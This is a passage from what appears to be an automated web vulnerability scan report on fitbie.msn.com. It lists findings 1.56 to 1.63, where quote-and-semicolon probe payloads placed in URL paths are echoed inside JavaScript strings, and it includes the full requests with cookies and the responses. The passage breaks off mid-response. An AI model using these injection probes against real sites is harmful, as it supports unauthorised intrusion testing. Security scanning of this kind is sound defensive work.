<a href="/flag/flag/favorites/all883e8';dd6432054c2?destination=node%2Fall883e8';dd6432054c2&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.56. http://fitbie.msn.com/sites/all/themes/fitlife/stylesheets/fitlife.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/stylesheets/fitlife.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 947c9'%3bc8f8c6e6f7a was submitted in the REST URL parameter 2. This input was echoed as 947c9';c8f8c6e6f7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all947c9'%3bc8f8c6e6f7a/themes/fitlife/stylesheets/fitlife.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all947c9';c8f8c6e6f7a?destination=node%2Fall947c9';c8f8c6e6f7a&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.57. http://fitbie.msn.com/sites/all/themes/fitlife/stylesheets/print.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/stylesheets/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d68dd'%3b1fcb816ab0e was submitted in the REST URL parameter 2. This input was echoed as d68dd';1fcb816ab0e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/alld68dd'%3b1fcb816ab0e/themes/fitlife/stylesheets/print.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:14 +0000
ETag: "1297606694-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:15 GMT
Date: Sun, 13 Feb 2011 14:18:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/alld68dd';1fcb816ab0e?destination=node%2Falld68dd';1fcb816ab0e&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.58. http://fitbie.msn.com/sites/default/files/200276112-001-TH_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/200276112-001-TH_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f8bd'%3b7858d5db37 was submitted in the REST URL parameter 2. This input was echoed as 5f8bd';7858d5db37 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default5f8bd'%3b7858d5db37/files/200276112-001-TH_0.jpg?1290562306 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:32 +0000
ETag: "1297607372-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:29:32 GMT
Date: Sun, 13 Feb 2011 14:29:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default5f8bd';7858d5db37?destination=node%2Fdefault5f8bd';7858d5db37&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.59. http://fitbie.msn.com/sites/default/files/56384394-TH.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/56384394-TH.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 205e4'%3b22a66a32303 was submitted in the REST URL parameter 2. This input was echoed as 205e4';22a66a32303 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default205e4'%3b22a66a32303/files/56384394-TH.jpg?1287517127 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:27 +0000
ETag: "1297607187-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:28 GMT
Date: Sun, 13 Feb 2011 14:26:28 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default205e4';22a66a32303?destination=node%2Fdefault205e4';22a66a32303&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.60. http://fitbie.msn.com/sites/default/files/56570375-TH.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/56570375-TH.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b891'%3bf1dfd5c5249 was submitted in the REST URL parameter 2. This input was echoed as 4b891';f1dfd5c5249 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default4b891'%3bf1dfd5c5249/files/56570375-TH.jpg?1287526062 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:26:30 +0000
ETag: "1297607190-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:26:30 GMT
Date: Sun, 13 Feb 2011 14:26:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default4b891';f1dfd5c5249?destination=node%2Fdefault4b891';f1dfd5c5249&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.61. http://fitbie.msn.com/sites/default/files/57278017-TH_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/57278017-TH_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e4db'%3bdab3e8cc3ca was submitted in the REST URL parameter 2. This input was echoed as 5e4db';dab3e8cc3ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/default5e4db'%3bdab3e8cc3ca/files/57278017-TH_0.jpg?1290563923 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:28 +0000
ETag: "1297607368-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:29 GMT
Date: Sun, 13 Feb 2011 14:29:29 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/default5e4db';dab3e8cc3ca?destination=node%2Fdefault5e4db';dab3e8cc3ca&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.62. http://fitbie.msn.com/sites/default/files/6-5-85-04-th_0.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/6-5-85-04-th_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45fb'%3b75bb9c38a63 was submitted in the REST URL parameter 2. This input was echoed as e45fb';75bb9c38a63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaulte45fb'%3b75bb9c38a63/files/6-5-85-04-th_0.jpg?1287609297 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:32 +0000
ETag: "1297607372-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:32 GMT
Date: Sun, 13 Feb 2011 14:29:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/defaulte45fb';75bb9c38a63?destination=node%2Fdefaulte45fb';75bb9c38a63&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.63. http://fitbie.msn.com/sites/default/files/77292027-th.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/default/files/77292027-th.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8b60'%3bc24714b7ad8 was submitted in the REST URL parameter 2. This input was echoed as f8b60';c24714b7ad8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/defaultf8b60'%3bc24714b7ad8/files/77292027-th.jpg?1287330146 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
